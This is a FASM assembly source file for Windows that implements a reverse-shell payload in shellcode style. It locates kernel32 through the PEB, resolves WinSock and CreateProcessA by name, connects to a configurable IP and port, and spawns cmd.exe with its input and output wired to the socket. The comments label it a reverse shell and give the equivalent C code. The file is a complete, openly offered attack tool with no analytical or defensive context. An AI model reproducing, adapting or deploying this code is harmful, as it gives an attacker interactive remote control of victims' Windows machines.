include 'C:\fasm\INCLUDE\win32ax.inc'

IP EQU 127 + 1*256*256*256
PORT EQU 8000h

Size_of_WSADATA EQU 400
Size_of_SOCKET EQU 4
Size_of_PROCESS_INFORMATION EQU 16
Size_of_STARTUPINFO EQU 68
Size_of_sockaddr_in EQU 16

AF_INET EQU 2
SOCK_STREAM EQU 1


.code
start:

push ebp
mov ebp, esp
sub esp, 1024

db 64h, 0A1h, 30h, 0h, 0h, 0h ;mov eax, fs:[30h]
mov eax, [eax + 0Ch]
mov esi, [eax + 1Ch]
lodsd
mov ebx, [eax + 08h]
mov [ebp - 4], ebx ;We have in [ebp - 4] the address off kernel32.dll

mov ecx, [ebx + 3Ch]
add ecx, ebx ;We have in ecx the address off PE

mov ecx, [ecx + 78h]
add ecx, ebx ;We have in ecx the address off .edata section

mov esi, [ecx + 20h]
add esi, ebx ;We have in esi the address off AddressOfNames table

xor edx, edx
cld
Find_GetProcAddress:
inc edx
lodsd
add eax, ebx
cmp dword [eax], "GetP"
jne Find_GetProcAddress
cmp dword [eax + 4], "rocA"
jne Find_GetProcAddress
cmp dword [eax + 8], "ddre"
jne Find_GetProcAddress

mov esi, [ecx + 24h]
add esi, ebx
add esi, edx
add esi, edx
lodsd
xor esi, esi
mov si, ax
dec esi

mov edx, [ecx + 1Ch]
add edx, ebx
shl esi, 2
add esi, edx
lodsd
add eax, ebx
mov [ebp - 32], eax ;We have in [ebp - 32] the address of GetProcAddress

mov dword [ebp - 20], "Load"
mov dword [ebp - 16], "Libr"
mov dword [ebp - 12], "aryA"
mov dword [ebp - 8], 0

lea ecx, [ebp - 20]
push ecx
push ebx
call eax ;We have in eax the address off LoadLibraryA

mov dword [ebp - 16], "ws2_"
mov dword [ebp - 12], "32.d"
mov dword [ebp - 8], "ll"

lea ecx, [ebp - 16]
push ecx
call eax
mov [ebp - 8], eax ;We have in [ebp - 8] the address off ws2_32.dll

mov dword [ebp - 20], "WSAS"
mov dword [ebp - 16], "tart"
mov dword [ebp - 12], "up"

lea ecx, [ebp - 20]
mov ebx, [ebp - 32]
push ecx
push eax
call ebx
mov [ebp - 12], eax ;We have in [ebp - 12] the address off WSAStartup

mov dword [ebp - 28], "Crea"
mov dword [ebp - 24], "tePr"
mov dword [ebp - 20], "oces"
mov dword [ebp - 16], "sA"

lea ecx, [ebp - 28]
mov ebx, [ebp - 4]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 4], eax ;We have in [ebp - 4] the address off CreateProcessA

mov dword [ebp - 24], "WSAS"
mov dword [ebp - 20], "ocke"
mov dword [ebp - 16], "tA"

lea ecx, [ebp - 24]
mov ebx, [ebp - 8]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 16], eax ;We have in [ebp - 16] the address off WSASocketA

mov dword [ebp - 24], "conn"
mov dword [ebp - 20], "ect"

lea ecx, [ebp - 24]
mov ebx, [ebp - 8]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 8], eax ;We have in [ebp - 8] the address off connect

;Now we habe in the stack the four Apis that our reverse shell will use.

;[ebp - 4]  ------------------------> CreateProcessA
;[ebp - 8]  ------------------------> connect
;[ebp - 12] ------------------------> WSAStartup
;[ebp - 16] ------------------------> WSASocketA



;Now I am goint to traslate to ASM this C code:



;WSADATA wsaData;
;SOCKET hSocket;
;STARTUPINFO si;
;PROCESS_INFORMATION pi;
;struct sockaddr_in adik_sin;

;memset(&adik_sin, 0, sizeof(adik_sin));
      ;memset(&si, 0, sizeof(si));
      ;WSAStartup(MAKEWORD(2,0), &wsaData);
      ;hSocket = WSASocket(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
      ;adik_sin.sin_family = AF_INET;
      ;adik_sin.sin_port = htons(Port);
      ;adik_sin.sin_addr.s_addr = inet_addr(IP);
      ;connect(hSocket, (struct sockaddr*)&adik_sin, sizeof(adik_sin));
      ;si.cb = sizeof(si);
      ;si.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
      ;si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
      ;CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &si, &pi);





cld
mov ecx, (Size_of_sockaddr_in + Size_of_STARTUPINFO)/4
lea ebx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO]
Put_zero:
mov dword [ebx], 0
add ebx, 4
loop Put_zero

lea ecx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA]
mov ebx, [ebp - 12]
push ecx
push 2
call ebx

mov ebx, [ebp - 16]
push 0
push 0
push 0
push 0
push SOCK_STREAM
push AF_INET
call ebx

mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET], eax

mov word [ebp - 16 - Size_of_sockaddr_in], AF_INET
mov word [ebp - 16 - Size_of_sockaddr_in + 2], PORT
mov dword [ebp - 16 - Size_of_sockaddr_in + 4], IP

mov eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET]
lea ecx, [ebp - 16 - Size_of_sockaddr_in]
mov ebx, [ebp - 8]
push Size_of_sockaddr_in
push ecx
push eax
call ebx

mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO], Size_of_STARTUPINFO
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 44], 257; STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW = 257
mov eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET]
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 56], eax
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 60], eax
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 64], eax

mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 8], "cmd."
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 4], "exe"

lea edx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 8]
lea ecx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO]
lea eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION]
mov ebx, [ebp - 4]
push eax
push ecx
push 0
push 0
push 0
push 1
push 0
push 0
push edx
push 0
call ebx